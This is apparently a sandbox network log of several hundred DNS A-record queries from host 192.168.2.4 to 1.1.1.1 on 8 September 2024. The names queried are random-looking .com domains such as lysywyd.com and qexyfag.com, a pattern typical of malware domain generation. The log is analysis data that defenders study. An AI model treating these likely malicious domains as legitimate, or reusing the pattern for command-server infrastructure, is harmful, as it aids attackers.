                                                                                                                                                                                                            Sep 8, 2024 09:00:05.783545017 CEST192.168.2.41.1.1.10x9c48Standard query (0)lysywyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.785105944 CEST192.168.2.41.1.1.10x54bcStandard query (0)galycah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.787352085 CEST192.168.2.41.1.1.10x2863Standard query (0)pumygil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.500796080 CEST192.168.2.41.1.1.10xf118Standard query (0)gacyzuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.500956059 CEST192.168.2.41.1.1.10x1453Standard query (0)vofymif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.501152992 CEST192.168.2.41.1.1.10xab85Standard query (0)lymyxir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.501293898 CEST192.168.2.41.1.1.10xa360Standard query (0)volyqam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.501862049 CEST192.168.2.41.1.1.10xd01cStandard query (0)qedyfyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.504173040 CEST192.168.2.41.1.1.10xcee3Standard query (0)galyqoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.504513025 CEST192.168.2.41.1.1.10xc454Standard query (0)lysynun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.504785061 CEST192.168.2.41.1.1.10xeecfStandard query (0)lysyfed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.504960060 CEST192.168.2.41.1.1.10x8843Standard query (0)lymysox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.505572081 CEST192.168.2.41.1.1.10xd9c5Standard query (0)gaqydaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.506097078 CEST192.168.2.41.1.1.10xa8faStandard query (0)lyxylyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.506112099 CEST192.168.2.41.1.1.10xc619Standard query (0)purydel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.506716013 CEST192.168.2.41.1.1.10x15d9Standard query (0)pumyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.506925106 CEST192.168.2.41.1.1.10x55f9Standard query (0)vowydet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.513241053 CEST192.168.2.41.1.1.10xa8edStandard query (0)pujyjol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.532464981 CEST192.168.2.41.1.1.10x6149Standard query (0)pufygup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.532715082 CEST192.168.2.41.1.1.10xbbd7Standard query (0)gaqycow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.541325092 CEST192.168.2.41.1.1.10x6218Standard query (0)lyxywen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.205847025 CEST192.168.2.41.1.1.10xb4f3Standard query (0)vojymuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.206372023 CEST192.168.2.41.1.1.10x8b2dStandard query (0)gahynuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.264537096 CEST192.168.2.41.1.1.10x3cf8Standard query (0)lyryson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.265037060 CEST192.168.2.41.1.1.10x7fd0Standard query (0)vocykec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.320461035 CEST192.168.2.41.1.1.10xf7cdStandard query (0)lyvywar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.321307898 CEST192.168.2.41.1.1.10xb6Standard query (0)pujygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.321723938 CEST192.168.2.41.1.1.10x9dd0Standard query (0)vopycoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.322669983 CEST192.168.2.41.1.1.10x617fStandard query (0)volyjif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.323118925 CEST192.168.2.41.1.1.10xb796Standard query (0)gatycis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.323853970 CEST192.168.2.41.1.1.10x2c0Standard query (0)vonyryk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.324640036 CEST192.168.2.41.1.1.10x871bStandard query (0)galyhib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.325479984 CEST192.168.2.41.1.1.10x8c1aStandard query (0)lykymij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.325956106 CEST192.168.2.41.1.1.10x81f3Standard query (0)ganyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.326291084 CEST192.168.2.41.1.1.10x51c8Standard query (0)lyxyjod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.327039003 CEST192.168.2.41.1.1.10xb1f2Standard query (0)puvylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.327441931 CEST192.168.2.41.1.1.10x7b0aStandard query (0)pupydev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.328145981 CEST192.168.2.41.1.1.10xee71Standard query (0)vofybet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.328774929 CEST192.168.2.41.1.1.10x46c0Standard query (0)qekyqoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.329438925 CEST192.168.2.41.1.1.10xcb72Standard query (0)vonyzut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.330265999 CEST192.168.2.41.1.1.10x5c18Standard query (0)gadyvez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.330899000 CEST192.168.2.41.1.1.10x7917Standard query (0)pufybyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.331628084 CEST192.168.2.41.1.1.10xf7d9Standard query (0)puzyjov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.332161903 CEST192.168.2.41.1.1.10xd053Standard query (0)lymytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.332742929 CEST192.168.2.41.1.1.10xfc14Standard query (0)qekyhug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.333103895 CEST192.168.2.41.1.1.10x51deStandard query (0)gacykas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.347846985 CEST192.168.2.41.1.1.10xdaacStandard query (0)gatydab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.348313093 CEST192.168.2.41.1.1.10xa2d3Standard query (0)purypig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.348619938 CEST192.168.2.41.1.1.10x79b5Standard query (0)qebyrel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.349128008 CEST192.168.2.41.1.1.10xdb72Standard query (0)qetysog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.349817038 CEST192.168.2.41.1.1.10xd9c5Standard query (0)lykygun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.350105047 CEST192.168.2.41.1.1.10x27bdStandard query (0)qetyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.350368023 CEST192.168.2.41.1.1.10xbfb2Standard query (0)qeqytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.350599051 CEST192.168.2.41.1.1.10xb1b5Standard query (0)qedyvap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.351074934 CEST192.168.2.41.1.1.10xd920Standard query (0)puvywal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.351635933 CEST192.168.2.41.1.1.10x2eaaStandard query (0)lysyvax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.352152109 CEST192.168.2.41.1.1.10xe07eStandard query (0)pupycop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.352705956 CEST192.168.2.41.1.1.10x8dbaStandard query (0)vojygym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.352983952 CEST192.168.2.41.1.1.10x404bStandard query (0)pumytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.354161978 CEST192.168.2.41.1.1.10x7685Standard query (0)gaqypuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.354547977 CEST192.168.2.41.1.1.10xab93Standard query (0)vowypim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.354830027 CEST192.168.2.41.1.1.10x26a6Standard query (0)qexykav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.355128050 CEST192.168.2.41.1.1.10xe20Standard query (0)lygynyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.357017994 CEST192.168.2.41.1.1.10x714eStandard query (0)ganyrew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.360832930 CEST192.168.2.41.1.1.10xac77Standard query (0)pujymiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.361110926 CEST192.168.2.41.1.1.10xd4c1Standard query (0)lyvylyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.361299038 CEST192.168.2.41.1.1.10xa60bStandard query (0)vopydaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.361856937 CEST192.168.2.41.1.1.10xf5e7Standard query (0)qebylyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.363137007 CEST192.168.2.41.1.1.10x7b0aStandard query (0)qegynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.363646984 CEST192.168.2.41.1.1.10x67dStandard query (0)vocyqot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.370637894 CEST192.168.2.41.1.1.10xc741Standard query (0)gadydow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.396419048 CEST192.168.2.41.1.1.10x6fd3Standard query (0)puzymup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.397888899 CEST192.168.2.41.1.1.10x7dbaStandard query (0)vofydak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.398355007 CEST192.168.2.41.1.1.10xb6ffStandard query (0)qexyqip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.398705006 CEST192.168.2.41.1.1.10xd614Standard query (0)lyryxud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.398922920 CEST192.168.2.41.1.1.10x2d4aStandard query (0)gacyqoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.399169922 CEST192.168.2.41.1.1.10xdc1Standard query (0)lyxymix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.399334908 CEST192.168.2.41.1.1.10xee67Standard query (0)lygyfej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.399725914 CEST192.168.2.41.1.1.10xe221Standard query (0)gaqyzyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.399893999 CEST192.168.2.41.1.1.10xd3d9Standard query (0)pufydaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.400285959 CEST192.168.2.41.1.1.10x8c44Standard query (0)qegyfeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.400449991 CEST192.168.2.41.1.1.10x3865Standard query (0)vowyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.408890009 CEST192.168.2.41.1.1.10x5cb4Standard query (0)gahyfyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.409749031 CEST192.168.2.41.1.1.10x6c84Standard query (0)puryxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.411005020 CEST192.168.2.41.1.1.10x18faStandard query (0)qeqylyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.046753883 CEST192.168.2.41.1.1.10x6b0dStandard query (0)pupypil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.048801899 CEST192.168.2.41.1.1.10x62aeStandard query (0)qebykoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.049343109 CEST192.168.2.41.1.1.10x64edStandard query (0)vopyput.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:09.050534010 CEST192.168.2.41.1.1.10x1303Standard query (0)gatypuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.855253935 CEST192.168.2.41.1.1.10xe6ddStandard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.855415106 CEST192.168.2.41.1.1.10x195bStandard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.856053114 CEST192.168.2.41.1.1.10x2382Standard query (0)gadypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.856523037 CEST192.168.2.41.1.1.10xd62Standard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.856690884 CEST192.168.2.41.1.1.10x7babStandard query (0)gacyfeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.856853962 CEST192.168.2.41.1.1.10x54a0Standard query (0)qebyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.866065025 CEST192.168.2.41.1.1.10x1dc7Standard query (0)pupyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.866729021 CEST192.168.2.41.1.1.10x1096Standard query (0)vocygef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.868004084 CEST192.168.2.41.1.1.10x478Standard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.869292021 CEST192.168.2.41.1.1.10x85c1Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.873251915 CEST192.168.2.41.1.1.10x3b1aStandard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.879596949 CEST192.168.2.41.1.1.10x383aStandard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.880023956 CEST192.168.2.41.1.1.10xfb2dStandard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.881084919 CEST192.168.2.41.1.1.10x343Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.881328106 CEST192.168.2.41.1.1.10xf203Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.881691933 CEST192.168.2.41.1.1.10x419bStandard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.881891966 CEST192.168.2.41.1.1.10x7d44Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.882172108 CEST192.168.2.41.1.1.10xdecStandard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.882776022 CEST192.168.2.41.1.1.10xba79Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.884644032 CEST192.168.2.41.1.1.10x987aStandard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.886056900 CEST192.168.2.41.1.1.10x5279Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.886893034 CEST192.168.2.41.1.1.10x6f60Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.887728930 CEST192.168.2.41.1.1.10xc81fStandard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.895889044 CEST192.168.2.41.1.1.10x536cStandard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.898397923 CEST192.168.2.41.1.1.10xc991Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.902045012 CEST192.168.2.41.1.1.10x34b5Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.902523994 CEST192.168.2.41.1.1.10x73e8Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.903369904 CEST192.168.2.41.1.1.10x5475Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.903477907 CEST192.168.2.41.1.1.10xec1fStandard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.903703928 CEST192.168.2.41.1.1.10x5a12Standard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.903959036 CEST192.168.2.41.1.1.10x5e04Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.904854059 CEST192.168.2.41.1.1.10xfff5Standard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.907171011 CEST192.168.2.41.1.1.10x6a64Standard query (0)vopybyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.908323050 CEST192.168.2.41.1.1.10xc4e6Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.908588886 CEST192.168.2.41.1.1.10x9535Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.908992052 CEST192.168.2.41.1.1.10x7ecfStandard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.909188986 CEST192.168.2.41.1.1.10x5e67Standard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.909636974 CEST192.168.2.41.1.1.10x951dStandard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.909847975 CEST192.168.2.41.1.1.10x7954Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.910372019 CEST192.168.2.41.1.1.10x5787Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.912704945 CEST192.168.2.41.1.1.10xd1b4Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.925534964 CEST192.168.2.41.1.1.10xad1aStandard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.925791979 CEST192.168.2.41.1.1.10xdaa4Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.926120996 CEST192.168.2.41.1.1.10xd22cStandard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.926599979 CEST192.168.2.41.1.1.10x713dStandard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.926599979 CEST192.168.2.41.1.1.10xcf5cStandard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.933391094 CEST192.168.2.41.1.1.10x1ee9Standard query (0)lykyvor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.934189081 CEST192.168.2.41.1.1.10xa23fStandard query (0)ganyhus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.934663057 CEST192.168.2.41.1.1.10xb5f8Standard query (0)qeqyqul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.105119944 CEST192.168.2.41.1.1.10x4c21Standard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.105504990 CEST192.168.2.41.1.1.10xa4adStandard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.113039970 CEST192.168.2.41.1.1.10xb28dStandard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.113254070 CEST192.168.2.41.1.1.10x7cc8Standard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.113502979 CEST192.168.2.41.1.1.10x2163Standard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.116625071 CEST192.168.2.41.1.1.10xcb1aStandard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.117341042 CEST192.168.2.41.1.1.10xb2ebStandard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.117683887 CEST192.168.2.41.1.1.10x9017Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.117916107 CEST192.168.2.41.1.1.10x9b3cStandard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.118216991 CEST192.168.2.41.1.1.10xe0c5Standard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.118515015 CEST192.168.2.41.1.1.10x8a70Standard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.125298977 CEST192.168.2.41.1.1.10xf134Standard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.126565933 CEST192.168.2.41.1.1.10x8cc1Standard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.138809919 CEST192.168.2.41.1.1.10x22ecStandard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.139141083 CEST192.168.2.41.1.1.10x53c0Standard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.139429092 CEST192.168.2.41.1.1.10xc208Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.151871920 CEST192.168.2.41.1.1.10xf608Standard query (0)qekyvol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.152354002 CEST192.168.2.41.1.1.10x8dafStandard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.204894066 CEST192.168.2.41.1.1.10xe484Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.205339909 CEST192.168.2.41.1.1.10x7326Standard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.205554962 CEST192.168.2.41.1.1.10x72adStandard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.206036091 CEST192.168.2.41.1.1.10xa746Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.206603050 CEST192.168.2.41.1.1.10x8394Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.207977057 CEST192.168.2.41.1.1.10xb27bStandard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.208316088 CEST192.168.2.41.1.1.10x778aStandard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.229367018 CEST192.168.2.41.1.1.10x8b97Standard query (0)galyvaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.483750105 CEST192.168.2.41.1.1.10x4f62Standard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.709214926 CEST192.168.2.41.1.1.10x4ac3Standard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.023562908 CEST192.168.2.41.1.1.10xd69aStandard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.024432898 CEST192.168.2.41.1.1.10x1d74Standard query (0)volymum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.026297092 CEST192.168.2.41.1.1.10x5e8fStandard query (0)gadydas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.027184963 CEST192.168.2.41.1.1.10x4311Standard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.028677940 CEST192.168.2.41.1.1.10x6ad0Standard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.030426025 CEST192.168.2.41.1.1.10xb2e3Standard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.030793905 CEST192.168.2.41.1.1.10xf2faStandard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.032049894 CEST192.168.2.41.1.1.10x327aStandard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.035804987 CEST192.168.2.41.1.1.10x94d4Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.653714895 CEST192.168.2.41.1.1.10x1402Standard query (0)vocybam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.653870106 CEST192.168.2.41.1.1.10x8c97Standard query (0)qedytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.654531002 CEST192.168.2.41.1.1.10x4749Standard query (0)gacyvah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.654937029 CEST192.168.2.41.1.1.10x8495Standard query (0)puryjil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.655127048 CEST192.168.2.41.1.1.10x880cStandard query (0)gahypus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.655294895 CEST192.168.2.41.1.1.10x21dbStandard query (0)volybec.comA (IP address)IN (0x0001)false
